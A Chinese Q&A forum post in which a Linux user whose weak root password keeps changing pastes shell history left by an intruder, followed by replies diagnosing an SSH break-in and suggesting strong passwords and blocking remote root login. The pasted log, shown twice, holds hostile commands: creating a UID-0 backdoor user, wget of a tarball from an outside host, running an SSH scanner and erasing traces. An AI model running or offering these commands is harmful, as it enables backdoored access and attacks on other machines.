UC知道Linux 的root密码问题
来源:百度知道 编辑:UC知道 时间:2024/05/26 21:39:28
最近我的root密码频繁丢失,不知道什么原因导致。短短4天丢失2次
我的密码喜欢设置简单的,我一共丢失了2次密码,都是123456,根本不存在我记错的可能,但为什么丢失?怎么丢失的我不得而知。每次都是当天晚上还能用,到第二天就无法登录了。
我打开终端,按上查看我上次输入的命令,但是出来了一些我绝对没有输过的命令!
cat /proc/cpuinfo
passwd
/usr/sbin/useradd -u 0 -o -g 0 http
passwd http
cd /etc/init.d
wget eryn.marte.ro/a.tgz
tar xzvf a.tgz
rm -rf a.tgz
cd .ssh
./ss 22 -a 210 -s 10
cd ..
rm -rf .ssh
cd /tmp
cat /etc/passwd
passwd crond
history
ps x
ls -la /proc/2489
cd /etc/rc.d/init.d/.tmp/
ls
cat m.ses
rm -rf .tmp
kill -9 2489
cd /tmp
这些命令我从来没有输入过,我是在查看我以前输入命令时发现的!我是不是中招了?
有人和我有相同的遭遇或者知道是怎么回事的帮我解释下!
谢谢
怎样能禁止被恶意登录?
我的密码喜欢设置简单的,我一共丢失了2次密码,都是123456,根本不存在我记错的可能,但为什么丢失?怎么丢失的我不得而知。每次都是当天晚上还能用,到第二天就无法登录了。
我打开终端,按上查看我上次输入的命令,但是出来了一些我绝对没有输过的命令!
cat /proc/cpuinfo
passwd
/usr/sbin/useradd -u 0 -o -g 0 http
passwd http
cd /etc/init.d
wget eryn.marte.ro/a.tgz
tar xzvf a.tgz
rm -rf a.tgz
cd .ssh
./ss 22 -a 210 -s 10
cd ..
rm -rf .ssh
cd /tmp
cat /etc/passwd
passwd crond
history
ps x
ls -la /proc/2489
cd /etc/rc.d/init.d/.tmp/
ls
cat m.ses
rm -rf .tmp
kill -9 2489
cd /tmp
这些命令我从来没有输入过,我是在查看我以前输入命令时发现的!我是不是中招了?
有人和我有相同的遭遇或者知道是怎么回事的帮我解释下!
谢谢
怎样能禁止被恶意登录?
有人远程登录 SSH 你的系统了吧。
用 last 看看。
1)密码要足够复杂。
2)设置策略禁止 root 用户远程登录。
你的服务器不在外网。否则每天你的服务器会受到成千上万次的恶意攻击。关于系统的安全策略,一两句话无法给你说明白。
很明显有人进入过你的系统进行了一些非法操作噻.
禁止恶意登录的方法很简单,设个复杂的密码即可
或者检查一下ssh等等服务